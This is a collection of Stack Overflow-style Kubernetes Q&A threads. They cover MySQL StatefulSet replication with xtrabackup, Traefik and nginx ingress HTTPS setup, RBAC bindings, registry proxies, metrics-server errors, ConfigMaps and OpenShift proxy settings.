image: gcr.io/google-samples/xtrabackup:1.0
ports:
- name: xtrabackup
containerPort: 3307
command:
- bash
- "-c"
- |
set -ex
cd /var/lib/mysql
# Determine binlog position of cloned data, if any.
if [[ -f xtrabackup_slave_info ]]; then
# XtraBackup already generated a partial "CHANGE MASTER TO" query
# because we're cloning from an existing slave.
mv xtrabackup_slave_info change_master_to.sql.in
# Ignore xtrabackup_binlog_info in this case (it's useless).
rm -f xtrabackup_binlog_info
elif [[ -f xtrabackup_binlog_info ]]; then
# We're cloning directly from master. Parse binlog position.
[[ `cat xtrabackup_binlog_info` =~ ^(.*?)[[:space:]]+(.*?)$ ]] || exit 1
rm xtrabackup_binlog_info
echo "CHANGE MASTER TO MASTER_LOG_FILE='${BASH_REMATCH[1]}',\
MASTER_LOG_POS=${BASH_REMATCH[2]}" > change_master_to.sql.in
fi
# Check if we need to complete a clone by starting replication.
if [[ -f change_master_to.sql.in ]]; then
echo "Waiting for mysqld to be ready (accepting connections)"
until mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD -e "SELECT 1"; do sleep 1; done
echo "Initializing replication from clone position"
# In case of container restart, attempt this at-most-once.
mv change_master_to.sql.in change_master_to.sql.orig
mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD <<EOF
$(<change_master_to.sql.orig),
MASTER_HOST='mysql-0.mysql',
MASTER_USER='root',
MASTER_PASSWORD='',
MASTER_CONNECT_RETRY=10;
START SLAVE;
EOF
fi
# Start a server to send backups when requested by peers.
exec ncat --listen --keep-open --send-only --max-conns=1 3307 -c \
"xtrabackup --backup --slave-info --stream=xbstream --host=127.0.0.1 --user=root"
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 100m
memory: 100Mi
volumes:
- name: conf
emptyDir: {}
- name: config-map
configMap:
name: mysql
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes: ["ReadWriteOnce"]
storageClassName: dynamic-nfs
resources:
requests:
storage: 10Gi
</code></pre>
| <p>The answer provided by Nicola Ben is close, but there were a few mistakes in the StatefulSet declaration.</p>
<p>The main problem is that the environment variable is declared in the mysql container but not in the xtrabackup container, where it is also referenced. Secondly, the START SLAVE and xtrabackup commands should take the user and password as well.</p>
<p>Here is a working version of the StatefulSet yaml declaration:</p>
<hr>
<pre><code>apiVersion: apps/v1
kind: StatefulSet
metadata:
name: mysql
spec:
selector:
matchLabels:
app: mysql
serviceName: mysql
replicas: 2
template:
metadata:
labels:
app: mysql
spec:
initContainers:
- name: init-mysql
image: mysql:5.7
command:
- bash
- "-c"
- |
set -ex
# Generate mysql server-id from pod ordinal index.
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
echo [mysqld] > /mnt/conf.d/server-id.cnf
# Add an offset to avoid reserved server-id=0 value.
echo server-id=$((100 + $ordinal)) >> /mnt/conf.d/server-id.cnf
# Copy appropriate conf.d files from config-map to emptyDir.
if [[ $ordinal -eq 0 ]]; then
cp /mnt/config-map/master.cnf /mnt/conf.d/
else
cp /mnt/config-map/slave.cnf /mnt/conf.d/
fi
volumeMounts:
- name: conf
mountPath: /mnt/conf.d
- name: config-map
mountPath: /mnt/config-map
- name: clone-mysql
image: gcr.io/google-samples/xtrabackup:1.0
command:
- bash
- "-c"
- |
set -ex
# Skip the clone if data already exists.
[[ -d /var/lib/mysql/mysql ]] && exit 0
# Skip the clone on master (ordinal index 0).
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
[[ $ordinal -eq 0 ]] && exit 0
# Clone data from previous peer.
ncat --recv-only mysql-$(($ordinal-1)).mysql 3307 | xbstream -x -C /var/lib/mysql
# Prepare the backup.
xtrabackup --prepare --target-dir=/var/lib/mysql
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
containers:
- name: mysql
image: mysql:5.7
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-root
key: password
- name: MYSQL_USER
value: server
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-user
key: password
- name: MYSQL_DATABASE
value: medlor
ports:
- name: mysql
containerPort: 3306
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 500m
memory: 1Gi
livenessProbe:
exec:
command: ["mysqladmin", "-uroot", "-p$MYSQL_ROOT_PASSWORD", "ping"]
initialDelaySeconds: 30
periodSeconds: 10
timeoutSeconds: 5
readinessProbe:
exec:
# Check we can execute queries over TCP (skip-networking is off).
command:
- /bin/sh
- -ec
- >-
mysql -h127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD -e'SELECT 1'
initialDelaySeconds: 5
periodSeconds: 2
timeoutSeconds: 1
- name: xtrabackup
image: gcr.io/google-samples/xtrabackup:1.0
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-root
key: password
ports:
- name: xtrabackup
containerPort: 3307
command:
- bash
- "-c"
- |
set -ex
cd /var/lib/mysql
# Determine binlog position of cloned data, if any.
if [[ -f xtrabackup_slave_info ]]; then
# XtraBackup already generated a partial "CHANGE MASTER TO" query
# because we're cloning from an existing slave.
mv xtrabackup_slave_info change_master_to.sql.in
# Ignore xtrabackup_binlog_info in this case (it's useless).
rm -f xtrabackup_binlog_info
elif [[ -f xtrabackup_binlog_info ]]; then
# We're cloning directly from master. Parse binlog position.
[[ `cat xtrabackup_binlog_info` =~ ^(.*?)[[:space:]]+(.*?)$ ]] || exit 1
rm xtrabackup_binlog_info
echo "CHANGE MASTER TO MASTER_LOG_FILE='${BASH_REMATCH[1]}',\
MASTER_LOG_POS=${BASH_REMATCH[2]}" > change_master_to.sql.in
fi
# Check if we need to complete a clone by starting replication.
if [[ -f change_master_to.sql.in ]]; then
echo "Waiting for mysqld to be ready (accepting connections)"
until mysql -h 127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD -e "SELECT 1"; do sleep 1; done
echo "Initializing replication from clone position"
# In case of container restart, attempt this at-most-once.
mv change_master_to.sql.in change_master_to.sql.orig
mysql -h 127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD <<EOF
$(<change_master_to.sql.orig),
MASTER_HOST='mysql-0.mysql',
MASTER_USER='root',
MASTER_PASSWORD='$MYSQL_ROOT_PASSWORD',
MASTER_CONNECT_RETRY=10;
START SLAVE USER='root' PASSWORD='$MYSQL_ROOT_PASSWORD';
EOF
fi
# Start a server to send backups when requested by peers.
exec ncat --listen --keep-open --send-only --max-conns=1 3307 -c \
"xtrabackup --backup --slave-info --stream=xbstream --host=127.0.0.1 --user=root --password=$MYSQL_ROOT_PASSWORD"
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 100m
memory: 100Mi
volumes:
- name: conf
emptyDir: {}
- name: config-map
configMap:
name: mysql
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 10Gi
</code></pre>
<p>I also noticed that in his file he has the replicas set to 1 which would only start the master and no slaves, so that might explain why some were getting startup failure on the slaves.</p>
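<p>For completeness, the StatefulSet above expects the <code>mysql-pass-root</code> and <code>mysql-pass-user</code> secrets to already exist; a minimal way to create them (the passwords here are placeholders) is:</p>
<pre><code>kubectl create secret generic mysql-pass-root --from-literal=password='root-password-here'
kubectl create secret generic mysql-pass-user --from-literal=password='user-password-here'
</code></pre>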
|
<p>I am using traefik as ingress controller in a K8s cluster. I'd like to enforce all traffic via HTTPS.</p>
<p>The documentation is a bit confusing because apparently there are different ways to do the same thing. Namely, I'd like to know the difference between these two:</p>
<ul>
<li><a href="https://docs.traefik.io/user-guide/examples/#http-redirect-on-http" rel="nofollow noreferrer">https://docs.traefik.io/user-guide/examples/#http-redirect-on-http</a></li>
<li><a href="https://docs.traefik.io/configuration/backends/kubernetes/#general-annotations" rel="nofollow noreferrer">https://docs.traefik.io/configuration/backends/kubernetes/#general-annotations</a></li>
</ul>
<p>If I use K8s, is it enough to use the general annotations or do I still have to edit the TOML file? </p>
<p>I have tried to use <code>traefik.ingress.kubernetes.io/redirect-entry-point: https</code> but doesn't find the service so I guess something is missing in my config.</p>
<p>If I remove the above line then everything works but HTTP -> HTTPS is, of course, not working. When I place the line back it returns a 404.</p>
<p>FWIW, the ingress definition is as follows (with traefik redirecting to 404): </p>
<pre><code> - apiVersion: extensions/v1beta1
kind: Ingress
metadata:
generation: 1
name: rekover-ingress
namespace: prod
annotations:
kubernetes.io/ingress.class: traefik
traefik.ingress.kubernetes.io/frontend-entry-points: http, https
traefik.ingress.kubernetes.io/redirect-entry-point: https
spec:
rules:
- host: www.xxx.com
http:
paths:
- backend:
serviceName: xxx-frontend
servicePort: 80
</code></pre>
<p>I have tried the very same configuration with nginx, changing to the respective metadata, and it worked! Below is the metadata used for nginx in the Ingress:</p>
<pre><code>nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
kubernetes.io/ingress.class: nginx
</code></pre>
<p>For completeness, I copy-paste the service definition for both nginx and traefik. First one works as expected:</p>
<pre><code>kind: Service
apiVersion: v1
metadata:
name: ingress-nginx
namespace: ingress-nginx
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
annotations:
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:xxxx
service.beta.kubernetes.io/aws-load-balancer-ssl-ports: https
spec:
selector:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
ports:
- name: http
port: 80
targetPort: http
- name: https
port: 443
targetPort: http
type: LoadBalancer
</code></pre>
<pre><code>
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: ingress-prod
annotations:
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:xxxx
service.beta.kubernetes.io/aws-load-balancer-ssl-ports: https
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- name: http
port: 80
targetPort: http
protocol: TCP
- name: https
port: 443
targetPort: http
protocol: TCP
type: LoadBalancer
</code></pre>
| <p>The first one is the toml <code>Traefik</code> configuration file, that can be modified in Kubernetes through a ConfigMap or in the Traefik container itself, or in the Traefik container command line (depending on how you deployed the Traefik Ingress Controller).</p>
<p>The second is what is mostly used to manage the configuration in the Traefik Ingress Controller through the <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/" rel="nofollow noreferrer"><code>Ingress</code></a> Kubernetes resource.</p>
<p>Your Ingress definition most likely doesn't have a way to handle HTTPS, and that's why when you add the annotation it sends traffic to port <code>443</code> and Traefik returns a <code>404</code>.</p>
<p>To handle HTTPS/TLS you would need to <a href="https://docs.traefik.io/user-guide/kubernetes/#add-a-tls-certificate-to-the-ingress" rel="nofollow noreferrer">enable it first</a> (Create a K8s cert secret, configure TLS in the Ingress, etc). Or <a href="https://medium.com/@dusansusic/traefik-ingress-controller-for-k8s-c1137c9c05c4" rel="nofollow noreferrer">this is another example</a> on how to enable it using a ConfigMap.</p>
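<p>As a hedged illustration only (it assumes TLS terminates at the Traefik controller rather than at the ELB, and that the <code>https</code> entrypoint exists in the controller configuration), enabling TLS on the Ingress side looks roughly like creating a TLS secret and referencing it:</p>
<pre><code># kubectl create secret tls mysite-tls --key tls.key --cert tls.crt -n prod
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: rekover-ingress
  namespace: prod
  annotations:
    kubernetes.io/ingress.class: traefik
    traefik.ingress.kubernetes.io/frontend-entry-points: http, https
    traefik.ingress.kubernetes.io/redirect-entry-point: https
spec:
  tls:
  - hosts:
    - www.xxx.com
    secretName: mysite-tls
  rules:
  - host: www.xxx.com
    http:
      paths:
      - backend:
          serviceName: xxx-frontend
          servicePort: 80
</code></pre>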
|
<p>My objective is to run the following command:</p>
<pre><code>sudo pachctl deploy google ${BUCKET_NAME} ${STORAGE_SIZE} --dynamic-etcd-nodes=1
</code></pre>
<p>I face an error about permissions that I have(posted at last). So, I wanted to create my role via the following command:</p>
<pre><code>sudo kubectl create clusterrolebinding aviralsrivastava-cluster-admin-binding --clusterrole=cluster-admin [email protected]
</code></pre>
<p>However, the above command is yielding me an error:</p>
<pre><code>Error from server (Forbidden): clusterrolebindings.rbac.authorization.k8s.io is forbidden: User "[email protected]" cannot create clusterrolebindings.rbac.authorization.k8s.io at the cluster scope: Required "container.clusterRoleBindings.create" permission.
</code></pre>
| <p>You need to apply following RBAC permission as a <code>cluster-admin</code> to provide permission to user <code>[email protected]</code> for creating clusterRole and clusterRoleBinding:</p>
<p>ClusterRole.yaml</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: prom-admin
rules:
# Just an example, feel free to change it
- apiGroups: [""]
resources: ["clusterRole", "clusterRoleBinding"]
verbs: ["get", "watch", "list", "create", "update", "patch", "delete"]
</code></pre>
<p>ClusterRoleBinding.yaml</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: prom-rbac
subjects:
- kind: User
  name: [email protected]
  apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: prom-admin
apiGroup: rbac.authorization.k8s.io
</code></pre>
|
<p>Is it possible to create a custom resource definition by reading the data from a yaml file and using the <a href="https://github.com/kubernetes-client/java" rel="nofollow noreferrer">Java client</a> for Kubernetes?
I am using version 3.0.0 of the library in sbt with Scala, but I was not able to find any methods for custom resource creation in the main library repository, while there are similar methods for the basic resources (like pods).</p>
| <p>Yes, but not only with the Java client.
First use some library to read the YAML and convert it to JSON,
and then use the K8s <a href="https://github.com/kubernetes-client/java/blob/master/kubernetes/src/test/java/io/kubernetes/client/apis/CustomObjectsApiTest.java" rel="nofollow noreferrer">API for custom resource objects</a>, or whatever else you want to do.</p>
|
<p>I have couple of namespaces - assume <code>NS1</code> and <code>NS2</code>. I have serviceaccounts created in those - <code>sa1</code> in <code>NS1</code> and <code>sa2</code> in <code>NS2</code>. I have created roles and rolebindings for <code>sa1</code> to do stuff within <code>NS1</code> and <code>sa2</code> within <code>NS2</code>.
What I want is give <code>sa1</code> certain access within <code>NS2</code> (say only Pod Reader role).</p>
<p>I am wondering if that's possible or not? </p>
| <p>You can simply reference a ServiceAccount from another namespace in the RoleBinding:</p>
<pre><code>apiVersion: rbac.authorization.k8s.io/v1beta1
kind: Role
metadata:
name: pod-reader
namespace: ns2
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: pod-reader-from-ns1
namespace: ns2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: pod-reader
subjects:
- kind: ServiceAccount
name: ns1-service-account
namespace: ns1
</code></pre>
|
<p>Is there any way to proxy or mirror the following Docker registries with my own Private Docker Registry?</p>
<ul>
<li>Google Container Registry</li>
<li>AWS EC2 Container Registry</li>
<li>Azure Container Registry</li>
<li>Quay.io</li>
<li>DockerHub</li>
</ul>
<p>I want to use a Private Registry to store all Docker Images I need.
I want to pull Images without changing the <code>repo/image:tag</code> name when doing a docker pull? For example, with Nexus if I want to do a:</p>
<p><code>docker pull gcr.io/google_containers/metrics-server-amd64:v0.2.1</code></p>
<p>I must change the repo name:</p>
<p><code>docker pull mynexus.mycompany.com/google_containers/metrics-server-amd64:v0.2.1</code></p>
<p>Is there any docker/kubernetes config that says: if someone pulls a <code>gcr.io</code> image, just go to <code>mynexus.mycompany.com</code> instead and use it as a pass-through cache?</p>
| <p>GCR, ECR, ACR and Quay.io are not supported by Docker's current built-in mirroring (it only mirrors Docker Hub).</p>
<p>Try one of these proxies:</p>
<p><a href="https://github.com/rpardini/docker-registry-proxy" rel="nofollow noreferrer">https://github.com/rpardini/docker-registry-proxy</a></p>
<p><a href="https://github.com/rpardini/docker-caching-proxy-multiple-private" rel="nofollow noreferrer">https://github.com/rpardini/docker-caching-proxy-multiple-private</a></p>
|
<p>Here is my use case:
We have a customer, where each of their services has to be available on dedicated subdomain. Naming convention should be <code>service-name.customerdomain.com</code>, where <code>service-name</code> is the deployed service and <code>customerdomain.com</code> is the customer domain. When a new service is created, it should be available <strong>automatically</strong>, i.e. once <code>service-name</code> service is deployed into the cluster, it has to be available on <code>service-name.customerdomain.com</code>.</p>
<p>I know, this can be achieved <strong>manually</strong> by following steps:</p>
<ol>
<li><p>Add Ingress controller to the cluster </p></li>
<li><p>Create wildcard DNS <code>*.customerdomain.com</code> and point it to the
Ingress controller</p></li>
<li>Map subdomain for each running service. For every existing service from the cluster create a separate section into Ingress resource file <code>ingress.yaml</code>, e.g.</li>
</ol>
<blockquote>
<pre><code>Spec:
rules:
- host: helloworld.awesome-customer.com
http:
paths:
- path: /*
backend:
serviceName: helloworld
servicePort: 8080
- host: nextfineapp.awesome-customer.com
http:
paths:
- path: /*
backend:
serviceName: nextfineapp
servicePort: 8080
- [...]
</code></pre>
</blockquote>
<ol start="4">
<li>Add Ingress resource file new <code>-host</code> section for each newly
deployed service</li>
<li>Remove Ingress resource file <code>-host</code> section for each removed
service</li>
</ol>
<p>Basically - I would like to automate steps 4 & 5. I am aware Ingress cannot handle this by itself, however, googling around, it appears that updating <code>ingress.yaml</code> file each time a new service is deployed / an existing one is removed can be achieved via <a href="https://helm.sh/" rel="nofollow noreferrer">Helm</a> and its values files.</p>
<p>I would appreciate if a sample solution can be pointed out / described below.</p>
| <p>You would generally do this by having a template for the Ingress resource as a part of your base application chart. You can have more than one Ingress object and they will all get muxed at run time to build the routing table for your controller.</p>
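<p>A minimal sketch of such a template (assuming a <code>domain</code> value in <code>values.yaml</code> and a Service named after the release; adjust to your chart's conventions) could look like this, placed in <code>templates/ingress.yaml</code> of the base chart:</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: {{ .Release.Name }}-ingress
spec:
  rules:
  - host: {{ .Release.Name }}.{{ .Values.domain }}
    http:
      paths:
      - path: /
        backend:
          serviceName: {{ .Release.Name }}
          servicePort: 8080
</code></pre>
<p>Installing or deleting a release then adds or removes its own Ingress, which covers steps 4 and 5 automatically.</p>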
|
<p>executing the command <code>kubectl get --raw /apis/metrics.k8s.io/v1beta1</code>
it returned <code>Error from server (ServiceUnavailable): the server is currently unable to handle the request</code></p>
<p>view the logs from metrics-server</p>
<p><code>http: TLS handshake error from 192.168.133.64:51926:EOF</code></p>
<p>kubelet version is 1.12.3</p>
<p>metrics-server 0.3.1</p>
<p>i have another clusters-set with the same version and configuration, metrics-server works just fine</p>
<p>part of metrics-server-deployment:
<code>
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
command:
- /metrics-server
- --kubelet-insecure-tls
volumeMounts:
- name: tmp-dir
mountPath: /tmp
</code></p>
| <p>Looks like it is failing because the hostname resolution happens through the internal DNS system, which has pod/service entries but not cluster node entries.</p>
<p>Try running your metrics-server with following arguments:</p>
<pre><code>- command:
- /metrics-server
- --kubelet-insecure-tls
- --kubelet-preferred-address-types=InternalIP
</code></pre>
<p>It should work for you as well.</p>
<p>For more info you can look at the following issue <a href="https://github.com/kubernetes-incubator/metrics-server/issues/131" rel="nofollow noreferrer">here</a></p>
<p>Hope this helps.</p>
|
<p>I've this <code>quartz.properties</code> file into <code>src/main/resources</code> folder project:</p>
<pre><code>org.quartz.jobStore.class = net.joelinn.quartz.jobstore.RedisJobStore
org.quartz.jobStore.host = redisbo
</code></pre>
<p>As you can see, I need to change <code>org.quartz.jobStore.host</code> according to current environment.</p>
<p>I mean, according to the environment my project has to be deployed, this value has to change as well.</p>
<p>All my environment are on kubernetes/openshift.</p>
<p>I don't quite figure out how to create a configmap in order to map this property of my <code>src/main/resources/quartz.properties</code>.</p>
<p>Any ideas?</p>
| <p>I think you can configure as following steps.</p>
<ul>
<li><p>Create <code>configmap</code> using <code>quartz.properties</code> file as follows.</p>
<pre>
# kubectl create configmap quartz-config --from-file=quartz.properties
</pre></li>
  <li><p>Mount the created <code>configmap</code> as a volume in the pod, as follows.</p>
<pre>
apiVersion: v1
kind: Pod
metadata:
name: test
spec:
containers:
- name: test-container
image: k8s.gcr.io/busybox
command: [ "/bin/sh", "-c", "ls /src/main/resources" ]
volumeMounts:
- name: config-volume
mountPath: /src/main/resources
volumes:
- name: config-volume
configMap:
name: quartz-config
restartPolicy: Never
</pre></li>
</ul>
|
<p>When I run</p>
<pre><code>oc import-image centos:7 --confirm true
</code></pre>
<p>I am getting</p>
<pre><code>The import completed with errors.
Name: centos
Namespace: pd-kube-ci
Created: Less than a second ago
Labels: <none>
Annotations: openshift.io/image.dockerRepositoryCheck=2018-12-27T21:00:26Z
Docker Pull Spec: docker-registry.default.svc:5000/pd-kube-ci/centos
Image Lookup: local=false
Unique Images: 0
Tags: 1
7
tagged from centos:7
! error: Import failed (InternalError): Internal error occurred: Get https://registry-1.docker.io/v2/: proxyconnect tcp: EOF
Less than a second ago
error: tag 7 failed: Internal error occurred: Get https://registry-1.docker.io/v2/: proxyconnect tcp: EOF
</code></pre>
<p>For the life of me, I cannot find the source of <code>proxyconnect tcp: EOF</code>. It's not found anywhere in the OpenShift/Kubernetes source. Google knows next to nothing about that.</p>
<p>I have also verified that I can <code>docker pull centos</code> from each node (including master and infra nodes). It's only when OpenShift tries to pull that image.</p>
<p>Any ideas?</p>
| <p>Turns out it was a mis-configuration in our <code>openshift_https_proxy</code> ansible var. Specifically we had:</p>
<pre><code>openshift_https_proxy=https://proxy.mycompany.com:8443
</code></pre>
<p>And we should have had</p>
<pre><code>openshift_https_proxy=http://proxy.mycompany.com:8443
</code></pre>
<p>To fix this, we had to edit <code>/etc/origin/master/master.env</code> on the masters and <code>/etc/sysconfig/docker</code> on all nodes, then restart per the <a href="https://docs.okd.io/3.11/install_config/http_proxies.html" rel="nofollow noreferrer">Working with HTTP Proxies</a> documentation.</p>
|
<p>Currently, I am working on AWS, ASG (AutoScale Group) and Kubernetes. In the infra, I created one Kubernetes cluster in which there is one master node and another one is a Worker node. </p>
<p>Now my question: in case of a high traffic volume, I use the HPA at the pod level, but it is also possible that this node is not able to handle all the requests. </p>
<p>So in this case, will the ASG create a new node or not?
If not, can someone suggest the best way to scale horizontally at the node level? </p>
<p>Thanks </p>
| <p>You can do a couple of things:</p>
<ul>
<li><p>Setup <a href="https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scale-based-on-demand.html#as-scaling-types" rel="nofollow noreferrer">Dynamic scaling</a> for your ASG to autoscale based on CloudWatch metrics (CPU, Mem) or your own metrics with your own automation.</p></li>
<li><p>Use the Kubernetes <a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler" rel="nofollow noreferrer">cluster autoscaler</a> so that it autoscales based on not having enough pod capacity on your nodes.</p></li>
</ul>
|
<p>I understand the principle of Ingress, how it routes to services by feeding an Ingress resource to the Ingress controller. </p>
<p>I use Docker for mac with the following Ingress controller: <a href="https://github.com/kubernetes/ingress-nginx/blob/master/docs/deploy/index.md#docker-for-mac" rel="nofollow noreferrer">https://github.com/kubernetes/ingress-nginx/blob/master/docs/deploy/index.md#docker-for-mac</a></p>
<p>There is just one thing I don't quite understand, and that is what type of service you are supposed to use. </p>
<p>Is it ok to use replica sets as you would do with regular load balancer services, and should you provide a resource of 'Kind' 'service' while omitting the 'spec/type' attribute in the service resource altogether? </p>
| <p>For your apps use a Service of type ClusterIP as you would for a cluster-internal Service. This is because they are now internal and it is only the ingress controller which is external. See examples in <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/services-networking/ingress/</a></p>
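<p>For example, a minimal ClusterIP Service for an app behind the ingress might look like this (names and ports are placeholders):</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
  name: my-app
spec:
  # type defaults to ClusterIP when omitted
  selector:
    app: my-app
  ports:
  - port: 80
    targetPort: 8080
</code></pre>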
<p>For the Ingress controller itself you typically use LoadBalancer, but it is your choice how you expose the ingress controller externally. You can use NodePort if that suits your cluster (e.g. it is on-prem). In that Docker for Mac example the ingress controller is of LoadBalancer type - <a href="https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/cloud-generic.yaml" rel="nofollow noreferrer">https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/cloud-generic.yaml</a> This is typically used for cloud providers but Docker for Mac supports it - <a href="https://stackoverflow.com/questions/49480737/docker-for-macedge-kubernetes-loadbalancer">Docker for Mac(Edge) - Kubernetes - LoadBalancer</a></p>
|
<p>I am trying to set up ingress-nginx-controller with type as <em>LoadBalancer</em>
using <a href="https://kubernetes.github.io/ingress-nginx/deploy/#elastic-load-balancer-elb" rel="nofollow noreferrer">this</a> guide for the configuration.<br>
A couple of issues I'm observing:<br>
issue #1) It does not create and deploy an ELB on AWS.<br>
issue #2) The <em>External-IP</em> status is showing as pending forever. </p>
<pre><code>$ kubectl get services -n ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
ingress-nginx LoadBalancer 10.108.245.210 <pending> 80:30742/TCP,443:31028/TCP 41m
</code></pre>
<p>I've followed each step mentioned there </p>
<pre><code>kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/mandatory.yaml
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/aws/service-l4.yaml
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/provider/aws/patch-configmap-l4.yaml
</code></pre>
<p>Here are the logs from the pod: </p>
<pre><code>~$ kubectl get pods -n ingress-nginx
NAME READY STATUS RESTARTS AGE
default-http-backend-7b8bdbc579-5tgd5 1/1 Running 0 5h57m
nginx-ingress-controller-766c77b7d4-w6wkk 1/1 Running 1 6h16m
$ kubectl logs -n ingress-nginx nginx-ingress-controller-766c77b7d4-w6wkk | more
-------------------------------------------------------------------------------
NGINX Ingress controller
Release: 0.21.0
Build: git-b65b85cd9
Repository: https://github.com/aledbf/ingress-nginx
-------------------------------------------------------------------------------
nginx version: nginx/1.15.6
W1228 06:50:15.592738 7 client_config.go:548] Neither --kubeconfig nor --master was specified. Using the inClusterConfig. This might not work.
I1228 06:50:15.593115 7 main.go:196] Creating API client for https://10.96.0.1:443
I1228 06:50:15.699540 7 main.go:240] Running in Kubernetes cluster version v1.13 (v1.13.1) - git (clean) commit eec55b9ba98609a46fee712359c7b5b365bdd920 - platfo$
m linux/amd64
I1228 06:50:16.060958 7 nginx.go:258] Starting NGINX Ingress controller
I1228 06:50:16.098387 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"nginx-configuration", UID:"60a8d471-0a6c-11e9-9$
55-024a9b465fb2", APIVersion:"v1", ResourceVersion:"1425", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/nginx-configuration
I1228 06:50:16.098548 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"tcp-services", UID:"60acc5c1-0a6c-11e9-9a55-024$
9b465fb2", APIVersion:"v1", ResourceVersion:"1426", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/tcp-services
I1228 06:50:16.103229 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"udp-services", UID:"60ae5849-0a6c-11e9-9a55-024$
9b465fb2", APIVersion:"v1", ResourceVersion:"1428", FieldPath:""}): type: 'Normal' reason: 'CREATE' ConfigMap ingress-nginx/udp-services
I1228 06:50:17.262403 7 nginx.go:279] Starting NGINX process
I1228 06:50:17.263106 7 leaderelection.go:187] attempting to acquire leader lease ingress-nginx/ingress-controller-leader-nginx...
I1228 06:50:17.267252 7 controller.go:172] Configuration changes detected, backend reload required.
I1228 06:50:17.280698 7 leaderelection.go:196] successfully acquired lease ingress-nginx/ingress-controller-leader-nginx
I1228 06:50:17.281401 7 status.go:148] new leader elected: nginx-ingress-controller-766c77b7d4-w6wkk
I1228 06:50:18.113969 7 controller.go:190] Backend successfully reloaded.
I1228 06:50:18.114768 7 controller.go:202] Initial sync, sleeping for 1 second.
[28/Dec/2018:06:50:19 +0000]TCP200000.000
I1228 06:51:07.572896 7 event.go:221] Event(v1.ObjectReference{Kind:"ConfigMap", Namespace:"ingress-nginx", Name:"nginx-configuration", UID:"60a8d471-
0a6c-11e9-9a55-024a9b465fb2", APIVersion:"v1", ResourceVersion:"1783", FieldPath:""}): type: 'Normal' reason: 'UPDATE' ConfigMap ingress-nginx/nginx-configu
ration
I1228 06:51:07.995982 7 controller.go:172] Configuration changes detected, backend reload required.
I1228 06:51:12.846822 7 controller.go:190] Backend successfully reloaded.
[28/Dec/2018:06:51:13 +0000]TCP200000.000
W1228 10:14:17.301340 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
